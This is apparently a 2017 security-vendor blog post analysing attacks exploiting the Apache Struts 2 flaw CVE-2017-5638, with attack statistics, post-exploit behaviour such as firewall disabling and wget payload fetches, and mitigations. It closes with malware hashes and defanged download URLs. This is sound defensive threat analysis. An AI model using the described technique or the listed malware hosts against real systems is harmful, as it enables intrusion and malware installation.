Apache Struts 2 Exploit Analysis

Data Analysis of CVE-2017-5638 Exploit Attempts

Terrance DeJesus

March 23, 2017 - Posted by Terrance DeJesus to Threat Intelligence

A major vulnerability, the Apache Struts 2 0-Day vulnerability (CVE-2017-5638), was recently discovered on March 6, 2017. Here at NTT Security, we analyze these types of vulnerabilities, setup detection capabilities and analyze any exploit attempts by threat actors as detected via the NTT Security Global Managed Security Services Platform.

This blog takes a further look, via data analysis, into the active exploit attempts of the Apache Struts 2 0-Day vulnerability as seen in the NTT Security Global Managed Security Services Platform. Through our analysis, we were able to uncover the source of the attacks, industries targeted, malware samples, and more. Additionally, based on our research, we were able to conclude that exploit attempts for this vulnerability will remain popular for some time, and have listed migitation and recommended actions further below in this blog to avoid future exploit attempts.

Background

On March 6, Apache released a security advisory (S2-045) concerning a vulnerability (CVE-2017-5638) in Struts 2 which could allow remote code execution (RCE). On March 7, a security researcher released a proof of concept (PoC) on Github concerning an RCE attack using the Content-Type header of an HTTP request to an Apache Struts 2 server. The PoC involved the use of the Apache Struts plugin, Jakarta Multipart parser, which when uploading a file with specific code inside of the Content-Type header, allowed for RCE.

Apache Struts 2 (CVE-2017-5638) Exploit Analysis

After discovery of the exploit, NTT Security analyzed our MSSP data to determine any exploit attempts. Below are basic statistics gathered from the MSSP data from March 9 - March 17.

Log Count: 8320
Event Count: 6194
Daily Average Count: 1040
Unique Attack Sources: 351
Unique Attack Source Countries: 13
Destination Ports: 80, 8080, 8011, 7253, 5000, 7219, 443, 9001, 8009, 7080, 8081, 4848, 14100 , 9093
Industries Targeted: Education (37%), Technology (5%), Finance (4%), Healthcare (28%), State/Local/Federal Government (<1%), Nosn-Profit (<1%), Manufacturing (2%), Retail (15%), Business Services (6%), Construction/Real Estate (<1%), Food/Beverage (<1%), Gaming/Entertainment (<1%)

NTT Security noticed exploit attempts almost immediately after signatures were installed. In Figure 1 below, the log count shows a slight decline up to March 12 before it continues to gradually increase over time, sharply increasing on March 17.

Figure 1: CVE-2017-5638 Log Count Over Time
Figure 1: CVE-2017-5638 Log Count Over Time

A large increase in exploit attempts was attributed to servers hosted in China as shown in Figure 2 and Figure 3. Analysis shows 76 percent of all exploit attempts originated from China.

Figure 2: Attack Source Map
Figure 2: Attack Source Map

Figure 3: Attack Source Over Time 
Figure 3: Attack Source Over Time

A further look into China’s post-exploit intentions show 69 percent attempted to disable local firewalls and install malware from remote servers using Linux retrieval commands such as wget. In some instances, wget was used but did not pull down any malicious binaries. These attempts allow the threat actors to track which servers are vulnerable and can retrieve additional binaries located on remote servers. Below is an example HTTP GET request from a server in China.

Figure 4: Example of HTTP Request Exploiting CVE-2017-5638 
Figure 4: Example of HTTP Request Exploiting CVE-2017-5638

Additionally, specific HTTP POST requests contained mainAction.action in the URI. These requests were only sent from specific China-based servers and each attempted to pull down Linux 32-bit and 64-bit malware as shown in Figure 4. MainAction() appears to be a class inside of Apache Struts responsible for preparing business objects for main.jsp. NTT Security determined that these requests were only coming from Chinese sources where post-exploit intentions downloaded malware over Post Office Protocol (POP) port 110. This activity could be used to bypass additional firewall rules. The malware names that NTT Security gathered ranged from UpTip60 though UpTip97. We triaged this information, and were able to determine that the intended result of exploit attempts is still underway.

Exploit Intentions – Reconnaissance

We determined post-exploit intentions were either to download malware, as shown in Figure 3, or for reconnaissance efforts. Reconnaissance accounted for 69 percent of all exploit attempts, but in a few instances threat actors were attempting to disable local firewalls and download malware. Several payloads indicated threat actors were attempting to use common Linux commands such as ifconfig, uname –r, echo and more. As stated previously, some of the payloads we analyzed attempted to use wget to a remote server page, which is believed to be used for tracking purposes as there was no attempt to change the permissions of any downloaded binaries, and there were no attempts to execute any local file. An example of this can be found in Figure 5.

Figure 5: Example of HTTP Request and wget Tracking 
Figure 5: Example of HTTP Request and wget Tracking

Exploit Intentions – Installation

As shown in Figure 4, several analyzed payloads showed attempts to disable local firewalls like iptables and SuSEfirewall2. If firewalls were successfully disabled, threat actors would then attempt to download malware from remote locations over specific ports. Malware hosts were located in the United States, China, and South Korea; however, as shown in Figure 6, exploit attempts where malware installation attempts were conducted only sourced from servers in China and the United States, suggesting compromised servers in South Korea. Further analysis of the data shows malware hosted in South Korea was being requested during exploit attempts from China. Figure 6 shows a bubble chart of the CVE-2017-5638 attack sources that attempted to pull down malware as well. Each bubble represents a remote malware host and the number of requests to each. As shown, Chinese sources attempted to pull malware from servers hosted in South Korea by ISP providers eHostIDC and KT Corporation.

Figure 6: Attack Source Country and Malware Correlation Chart. 
Figure 6: Attack Source Country and Malware Correlation Chart. Each bubble represents the source of the attack and a unique malware host associated. The large the bubble the more malware retrieval attempts.

Malware Overview:

We were able to retrieve several malware samples which threat actors attempted to install on vulnerable systems. These samples ranged from PERL DDoS bots to 32-bit and 64-bit ELF binaries. While analyzing the sample with hash value e6408aa9db0a1e09c8028f87d3a8f0cf, it was apparent a targeted list of IP addresses was hardcoded into the binary. These IP addresses were identified as a list of DNS servers leveraged for the DNS amplication capabilities of this sample. As shown in Figure 7, the functions are specific on their use and intentions such as CAttackIe and CAttackIcmp. Analysis and triaging these malware samples is still being conducted at the time of this writing.

Figure 7: e6408aa9db0a1e09c8028f87d3a8f0cf Hardcoded IPs and Functions
Figure 7: e6408aa9db0a1e09c8028f87d3a8f0cf Hardcoded IPs and Functions

Predictive Analysis:

After analysis, we expect exploit attempts against CVE-2017-5638 will continue because of the simplicity of the vulnerability, popularity of the product and the ability to execute code remotely. Probing attempts in which threat actors are using wget to test if retrieving additional files is possible on vulnerable machines indicates threat actors will be targeting this list of hosts sooner rather than later.

Affected Systems:

  • Apache Struts versions 2.3.5 – 2.3.3
  • Apache Struts versions 2.5.0 – 2.5.10

Snort Signatures:

Figure 8: Snort Signatures
Figure 8: Snort Signatures

Mitigation and Recommended Actions:

  • Upgrade to Struts 2.3.32 or Struts 2.5.10.1
  • Implement a Servlet filter which will validate Content-Type and throw away requests with suspicious values not matching multipart/form-data
  • Change to a different multipart parser such as Pell or the parser from the Commons-File Upload Library

Malware Hashes:

0132c766b1855c27819d9c108c7954c2
14782a44772c0b5fa69168b58ee6c9cd
58e50a7a0b76ce7601ae0096bb499d55
706b501e23b7dd3acac547daaa1298a2
7b2e2d5b06ed82d204a1d651a69d1845
cdc457633178e845bb4b306531a4588b
e6408aa9db0a1e09c8028f87d3a8f0cf
f8886fb4e56dbfd877eb8b8a5d125844

Malware Locations:

hxxp://65[.]254[.]63[.]20/[.]jb
hxxp://180[.]100[.]235[.]26:110/UpTip66
hxxp://180[.]150[.]226[.]202:8087/LG
hxxp://180[.]100[.]235[.]26:110/UpTip67
hxxp://aaa[.]linuxa[.]club:57843/linux
hxxp://192[.]161[.]172[.]197:367/com
hxxp://180[.]100[.]235[.]26:110/UpTip70
hxxp://180[.]100[.]235[.]26:110/UpTip69
hxxp://121[.]181[.]239[.]197:741/lin64
hxxp://107[.]179[.]45[.]9:8088/lol
hxxp://222[.]186[.]58[.]138:9278/Telenn
hxxp://65[.]254[.]63[.]20/ozoz
hxxp://192[.]161[.]172[.]197:60012/com
hxxp://192[.]161[.]172[.]197:352/VIP
hxxp://180[.]100[.]235[.]26:110/UpTip61
hxxp://122[.]114[.]2[.]17:8087/canager
hxxp://121[.]181[.]239[.]197:741/VIP

References:
http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5638
https://cwiki.apache.org/confluence/display/WW/S2-045

Read more on Solutionary Minds about:

Voted one of the Best Computer Security Blogs 2016
NTT Security (US), Inc. (formerly Solutionary) is a security consulting and managed security services provider. The NTT Security blog is a place for IT professionals to both learn and talk about the latest in IT security and compliance.

Get the NTT Security Blog delivered to your inbox!

Enter your Email:

(We will not share your email or use it for anything else.)

LATEST TWEETS